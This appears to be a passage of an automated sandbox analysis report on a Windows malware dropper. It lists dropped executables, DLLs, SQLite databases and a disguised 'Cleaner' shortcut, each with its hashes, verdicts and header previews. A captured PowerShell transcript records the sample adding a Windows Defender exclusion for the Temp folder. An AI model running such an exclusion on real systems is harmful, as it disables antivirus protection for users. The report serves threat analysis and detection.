                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):116238
                                                                                                                          Entropy (8bit):6.249236557413483
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:nti6N0WeF35Ro7hAWP6cagLSuf6LG3qSbKE4M:ti6N2F33wGJVuHuE
                                                                                                                          MD5:9AEC524B616618B0D3D00B27B6F51DA1
                                                                                                                          SHA1:64264300801A353DB324D11738FFED876550E1D3
                                                                                                                          SHA-256:59A466F77584438FC3ABC0F43EDC0FC99D41851726827A008841F05CFE12DA7E
                                                                                                                          SHA-512:0648A26940E8F4AAD73B05AD53E43316DD688E5D55E293CCE88267B2B8744412BE2E0D507DADAD830776BF715BCD819F00F5D1F7AC1C5F1C4F682FB7457A20D0
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....^...................p.....n.........................0................ .........................u.................................... ..$...........................D........................................................text....\.......^..................`.P`.data...,....p.......b..............@.0..rdata..T............d..............@.`@/4.......4.......4...r..............@.0@.bss..................................`..edata..u...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..$.... ......................@.0B................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\libstdc++-6.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\T4IoJqcAwY.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):662528
                                                                                                                          Entropy (8bit):7.222450867745387
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:ZGRoW1chMjnv+gvJhb6bmpPSmCnh4o0v4Mc2jTrKoDSwq/3PmkfT4CmwcMcP1uE:uowcmBhKmlC4o0v4k1
                                                                                                                          MD5:5E279950775BAAE5FEA04D2CC4526BCC
                                                                                                                          SHA1:8AEF1E10031C3629512C43DD8B0B5D9060878453
                                                                                                                          SHA-256:97DE47068327BB822B33C7106F9CBB489480901A6749513EF5C31D229DCACA87
                                                                                                                          SHA-512:666325E9ED71DA4955058AEA31B91E2E848BE43211E511865F393B7F537C208C6B31C182F7D728C2704E9FC87E7D1BE3F98F5FEE4D34F11C56764E1C599AFD02
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....H...........0.......`.....o.........................`............... ..........................w.. @..$...........................DA...............................?.......................................................text....P.......B..................`.P..data.... ...`.......F..............@.`..rdata...........>...H..............@.`./4...........`......................@.0..bss..................................`..edata...........x...6..............@.0..idata... ...p......................@.0..CRT................................@.0..tls................................@.0..reloc...........P..................@.0..aspack.. ...0......................`....adata.......P......................@...................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\libwinpthread-1.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\T4IoJqcAwY.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70656
                                                                                                                          Entropy (8bit):6.292322392729986
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:xPCESXKWzkxTz8uLfdkWr2sUX8YNKykl1wwwwUXrMZE4cYdz:x6baWwxH8EzSHYZE4cYdz
                                                                                                                          MD5:1E0D62C34FF2E649EBC5C372065732EE
                                                                                                                          SHA1:FCFAA36BA456159B26140A43E80FBD7E9D9AF2DE
                                                                                                                          SHA-256:509CB1D1443B623A02562AC760BCED540E327C65157FFA938A22F75E38155723
                                                                                                                          SHA-512:3653F8ED8AD3476632F731A3E76C6AAE97898E4BF14F70007C93E53BC443906835BE29F861C4A123DB5B11E0F3DD5013B2B3833469A062060825DF9EE708DC61
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....,.Q...........#................@..............d......................................... ...................... ..,....@..,....p..P.......................(............................`.......................A..d............................text...............................`.P`.data...............................@.0..rdata..............................@.`@.bss..................................`..edata..,.... ......................@.0@.idata..,....@......................@.0..CRT....0....P......................@.0..tls.... ....`......................@.0..rsrc...P....p......................@.0..reloc..(...........................@.0B................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\T4IoJqcAwY.exe
                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2223997
                                                                                                                          Entropy (8bit):6.012746678976057
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:54LHY/YZb9MmtC3XTVnZWqKz8+PgWl3juQ55313d:54RidKzVoWl3F
                                                                                                                          MD5:9B3B6EB4710B6B689E6D3C8AC68347FB
                                                                                                                          SHA1:F10B9720C9DD6585908A8832EF73590CA28E583B
                                                                                                                          SHA-256:F80D74499345B0365BE997C4535AED5A26A4C933734E40AA6D2C56DD10EF99FF
                                                                                                                          SHA-512:055325A465D1588EE82913B98655DB96D4A832C06961143CEECE165835FB36FBF000962C056A757E1F58FCB4C530D3FFC29D2851FD38111E3407C100FFD9B7E9
                                                                                                                          Malicious:true
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`..b.....X...............6....................@.................................0."....... ..............................`...............................................................F......................Lb...............................text...8...........................`.P`.data...............................@.`..rdata..............................@.`@/4.................................@.0@.bss.........P........................`..idata.......`.......(..............@.0..CRT....4....p.......6..............@.0..tls.................8..............@.0./14..................:..............@.@B/29..................<..............@..B/41..........0......................@..B/55......U...P...V..................@..B/67.....8............<..............@.0B/80..................>..............@..B/91.....8............B..............@..B/102....................

                                                                                                                          C:\Users\user\AppData\Local\Temp\EiQNHZBKuJTjKqhbvGXJOlJuk4B2datiHBiqQH

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):73728
                                                                                                                          Entropy (8bit):1.1874185457069584
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                          MD5:72A43D390E478BA9664F03951692D109
                                                                                                                          SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                          SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                          SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\JFv6.cpl

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925776f05_4ee107b.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):715052616
                                                                                                                          Entropy (8bit):2.0290620866729316
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:2C7B580A227ADD3C572FB530A4C240B3
                                                                                                                          SHA1:DBD11A0F0ABB4C5534D390B9AD685653D9EC3332
                                                                                                                          SHA-256:3EA45C874B7D0307A4436789E564933FE928DA594E12BC561303FC2BF7426B49
                                                                                                                          SHA-512:9A73CC8C7EB7496CEB888BBD8F600EBD941B45FDC207D2E81D21B404CC3F27060EF6182BE10A401B8A6D32E57ABBD134FABD63B2371B93B4C446B007B6ED8C69
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...v.B*..........................................@............................*......*.........................................%.......2.............*H$...0.....................................................................................CODE................................ ..`DATA................................@...BSS.....A................................idata...%.......&..................@....reloc......0......................@..P.rsrc....2.......2..................@..PDATA.......*.......*................@..b........................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\UEgEzFjhgULJ9Rr2YXrzq41yrt2

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.792852251086831
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                          MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                          SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                          SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                          SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\X6dpJUiTzceRmhCxtTO4T5M

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.7006690334145785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
                                                                                                                          MD5:A7FE10DA330AD03BF22DC9AC76BBB3E4
                                                                                                                          SHA1:1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
                                                                                                                          SHA-256:8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
                                                                                                                          SHA-512:1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\YQEfLiaEJum5xoC6Kk\Bunifu_UI_v1.5.3.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):242176
                                                                                                                          Entropy (8bit):6.47050397947197
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                                                                                          MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                                                                                          SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                                                                                          SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                                                                                          SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...

                                                                                                                          C:\Users\user\AppData\Local\Temp\YQEfLiaEJum5xoC6Kk\Cleaner.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2091639
                                                                                                                          Entropy (8bit):5.299126680636148
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:fdY03Sxby0GmTG2/mR6Trr2h6gPHOSmq3m4VWZRAxgA3F4mrZX:e71Zrr2h6gPHOnkJ0vA2ABp
                                                                                                                          MD5:87BD492E93D3001339566CAA2E15C319
                                                                                                                          SHA1:80D00CEE1F35ACEA147E5D81C8A798E56EFE2BA3
                                                                                                                          SHA-256:2CA2AF059F6720613BC64E49A6D5AF0E4046BB40E7AEE968B82CE3474171B932
                                                                                                                          SHA-512:92CC0997A5024E17D559E26972100BD1BD3C4DFEE408C73396204858EE9B987906F05E6F7EE19B1698DF39748AEAEE5B926762F677CFEE9AC0CE26AF6A2FDB46
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...8,............"...0..............%... ...@....@.. ....................................`.................................T%..O....@..B....................`......8%............................................... ............... ..H............text........ ...................... ..`.rsrc...B....@......................@..@.reloc.......`......................@..B.................%......H.......T...,C......T........a............................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r[..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3okr4wjw.qow.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:very short file (no magic)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1
                                                                                                                          Entropy (8bit):0.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:U:U
                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:1

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ngbojjo4.0wy.psm1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:very short file (no magic)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1
                                                                                                                          Entropy (8bit):0.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:U:U
                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:1

                                                                                                                          C:\Users\user\AppData\Local\Temp\is-MLHOA.tmp\62829252dc457_91e450cbce.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3194368
                                                                                                                          Entropy (8bit):6.327326740477678
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:qEA9P+bz2cHPcUb6HSb4SOEMkBeH7nQckO6bAGx7jXTV+333TY:692bz2Eb6pd7B6bAGx7s333T
                                                                                                                          MD5:266673B16AB08A498DEB528139DC7213
                                                                                                                          SHA1:F4F91F8056DBEDC155B3965F19EEAC7D185F1C9C
                                                                                                                          SHA-256:C6FA242B88805720DAF185DB905717FF44F23086BB89F3409F100D4F80D95D3F
                                                                                                                          SHA-512:C7FCE8E4144F3B484726B6E0202CF4C911091AB04D5EA90AE445E9B5ADBA56F0E7F4F76F6F01917FCCB8A566DDB6B3C4440FEE5CF81FD56DEE17F7BEC984F908
                                                                                                                          Malicious:true
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...(..`.................:,.........`F,......P,...@...........................1...........@......@....................-......p-.29....-.......................................................-......................y-.......-......................text.....,.......,................. ..`.itext...(... ,..*....,............. ..`.data........P,......>,.............@....bss.....y....,..........................idata..29...p-..:....,.............@....didata.......-.......-.............@....edata........-.......-.............@..@.tls....L.....-..........................rdata..].....-.......-.............@..@.rsrc.........-.......-.............@..@..............1.......0.............@..@........................................................

                                                                                                                          C:\Users\user\AppData\Roaming\0Ewjzg90jv\SKG1KLB0.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):378880
                                                                                                                          Entropy (8bit):6.939587453869253
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:J6R+rSdqzfvSTkFCS/u0mH0EKvhbK1jH37jrx6D1hDKZvN:JYBUbvSgCS/uFHkbKJjrO1hK
                                                                                                                          MD5:DFBA5B77CDAF8B7A1D4811270E48500C
                                                                                                                          SHA1:389469C3AC3B13B5ECFEFC4869D991D1D030FCE1
                                                                                                                          SHA-256:865C4CAE53E47E108F85F063328E73ACAD8B9D0FD4916650DBB14B816CE82E65
                                                                                                                          SHA-512:68FF182C1FFE72771533F4D569F89948CF3AFB773309F03D757DCA3F5CCA5C8E47C82276E683191BF008CC72D6EB6F250B29BCC64F1FC9C69116BF500C0E5A3A
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........a....}...}...}B.}...}...}..}..}y..}..}..}.`t}...}...}4..}..}...}...}...}...}...}Rich...}................PE..L.....`.........................................@.................................gV..........................................(.......P...........................@...............................8...@............................................text............................... ..`.data...............................@....rsrc...P...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Roaming\9BYudB\9YDqJhJn.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exe
                                                                                                                          File Type:MS-DOS executable, MZ for MS-DOS
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1506304
                                                                                                                          Entropy (8bit):7.953802429674758
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:CKDJsmAQm9eF0v5VLrt/Cbqo7HGwW2R+pWzV1Y6xpZewrtgyc3yvEVDn:Bsom9e6v5V9bgHGHQdzceUutHEVj
                                                                                                                          MD5:293091DB2C858A21F85D123712A4BE3E
                                                                                                                          SHA1:9049B93C08D61DBD78BD0A4113D12CC348E784E1
                                                                                                                          SHA-256:AD7D2F6021A3513D6DE3A3F771AAEA5F21C6B4C3223C69FA532B5D13EB95974B
                                                                                                                          SHA-512:CF0242D814993AE8FD5217865820B206C83FF58FB95E0E2033BEA760218005879BFCC09381E0F5C0BA330C8E564A52F526AF3F626FC7589501FE9AA10AB7DC59
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ@.....................................!..L.!Win32 .EXE...$@...PE..L.....b..................)..<........:......0)...@...........................;.....+x........................................:.......:..J..........................................................................<.:..............................MPRESS1.p:..............................MPRESS2......:..........................rsrc....J....:..L..................@..............................................................................v2.19...... ..+.....X.M..R[I\U...VV.}.u...{.y6....qz.6...zU.j..J.>...<oB.....S..v9H.9....Q..\.$...W{S....H...S....v(.{.4....`'9..Lg..x.M1m.GOavL^......>C..A.?0.ErR0.&V..hZx..l........&...H`.........}...\.....H.....G@..n....[>i*.CW.0.M..V.Ir.q...);.G.O.z=K...D#.y.p)9.....J.T.?.J.+i.A.sU..2.b...]GCJ.:.C?*E.w!ZF..r.....+..6j.,....~.r.......K.Z..a.w..&.A.t..Z.3KH.....U...s<.B.,}0.Y..~...jF{+.z....Ir%Y..e..v.......T...........x....H.x*.....L..<T_.h.......5nS..;.a...W...M;

                                                                                                                          C:\Users\user\AppData\Roaming\Mhmb9HRS\qKVHB75j.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):718848
                                                                                                                          Entropy (8bit):7.515568310796458
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:WteBoPwbYed82X+llRjyUX9Wq+Umjl8CCRjx0W6e/bgmq:W8okpy2X+H9JtWsmJ7CRjxTDW
                                                                                                                          MD5:E4D1C291BBC7E0F2B428D901A38C7C0A
                                                                                                                          SHA1:479E64491284E37FD5C6F6D309D38BBB2CF684EB
                                                                                                                          SHA-256:72C3EAE6E305CF23E5754986F486D824CFB0F6D3A11298346447F7E42CB97EC4
                                                                                                                          SHA-512:96AAF3E4D41EF358F40DFAFAC3C1DF6ADF4B87313199C76B01F11A4229B674259B6EF935F52F1BD5316E2EC63D2C47967714E5CC99F5243B5FAB9FAED6147D79
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2...v...v...v....F.w...h.E.d...h.T.6...h.S.....Q<..s...v......h.Z.w...h.D.w...h.A.w...Richv...........................PE..L....}.`.................P...................`....@.................................9M.......................................L..<.... ..................................................................@............................................text...RN.......P.................. ..`.data...h....`.......T..............@....rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\Cleaner.lnk

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exe
                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Sat May 21 06:33:59 2022, mtime=Sat May 21 06:34:03 2022, atime=Sat May 21 06:33:59 2022, length=2091639, window=hide
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2141
                                                                                                                          Entropy (8bit):3.847463913883869
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:8Y3CKNORCM8icDNabD36vDa2936vDDZnq36vDrB6:8GNGTiQzmaKmEmr
                                                                                                                          MD5:79B53659838B48D60473F83490A356E3
                                                                                                                          SHA1:19C5458E33AB5F91E0FE6EFEF9834CA88B4F9301
                                                                                                                          SHA-256:1D032BDF148418B9BF4F7A9471F35AC6377635A3674AF42D0DDE14386174F414
                                                                                                                          SHA-512:23A4D9153C6E8F5D9634245886C30F7254C6FA33BE641DC40BCA6BBB9726FDCB57960503B1E2A47DB9B7A25EB2FD698D6394FBDEB82BB5C8E363CC736A597EA5
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:L..................F.@.. ......".l..^@[%.l..p..".l..w.......................,.:..DG..Yr?.D..U..k0.&...&...........-..!...2..4.L%.l......t...CFSF..1......N....AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......N...T.;.....Y....................yN|.A.p.p.D.a.t.a...B.P.1......T*<..Local.<.......N...T+<.....Y....................H...L.o.c.a.l.....N.1......T<<..Temp..:.......N...T=<.....Y........................T.e.m.p.....n.1......T@<..YQEFLI~1..V......T.<.TB<.........................E.$.Y.Q.E.f.L.i.a.E.J.u.m.5.x.o.C.6.K.k.....b.2.w....T@< .Cleaner.exe.H......T@<.T@<....}....................... .C.l.e.a.n.e.r...e.x.e.......o...............-.......n...........lk( .....C:\Users\user\AppData\Local\Temp\YQEfLiaEJum5xoC6Kk\Cleaner.exe....O.p.t.i.m.i.z.e. .y.o.u.r. .P.C.4.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.Y.Q.E.f.L.i.a.E.J.u.m.5.x.o.C.6.K.k.\.C.l.e.a.n.e.r...e.x.e.@.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.Y.Q.E.f.L.i.a.E.J.u.m.5.x.o.C.6.K.k.\.C.l.e.a

                                                                                                                          C:\Users\user\Documents\20220521\PowerShell_transcript.651689.0a5kQpKh.20220521093026.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4791
                                                                                                                          Entropy (8bit):5.3962593245053645
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:BZujZN3nqDo1ZIZijZN3nqDo1Zm35GZTjZN3nqDo1ZdqfOZm:r
                                                                                                                          MD5:25D32E3B99B35A44A549F9C58D4759A3
                                                                                                                          SHA1:026EF01B51FC67899EF01FF2A525A323DC63769F
                                                                                                                          SHA-256:70EFC5FDDE9FD36F938E53C2F808CB305402D9161F256BAC38D5986EF90056B0
                                                                                                                          SHA-512:316F5E67FD5DF89B971F6FF7D53B7EF208294DC5FEB471B5375354B9B473546E3E3EFE88E529119863424AC91E24AABC62E91DE25F9BC5657909A8C9CB1E6763
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:.**********************..Windows PowerShell transcript start..Start time: 20220521093028..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 651689 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp..Process ID: 2436..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220521093028..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp..**********************..Windows PowerShell transcript start..Start time: 20220521093352..Username: computer\user..RunAs User: computer\user..Config

                                                                                                                          C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1572864
                                                                                                                          Entropy (8bit):4.237927468312859
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:UmT0Th31T9p6LTSPkr93/h0t+Adgn22e8wEQZs64Jtsw2C/w:9T0Th31T9p6TSPuA+
                                                                                                                          MD5:6A93AA530C2A82A1894DDDF32B773FA4
                                                                                                                          SHA1:A931C259BEBC9E921E2C733706D12E68278DAFC3
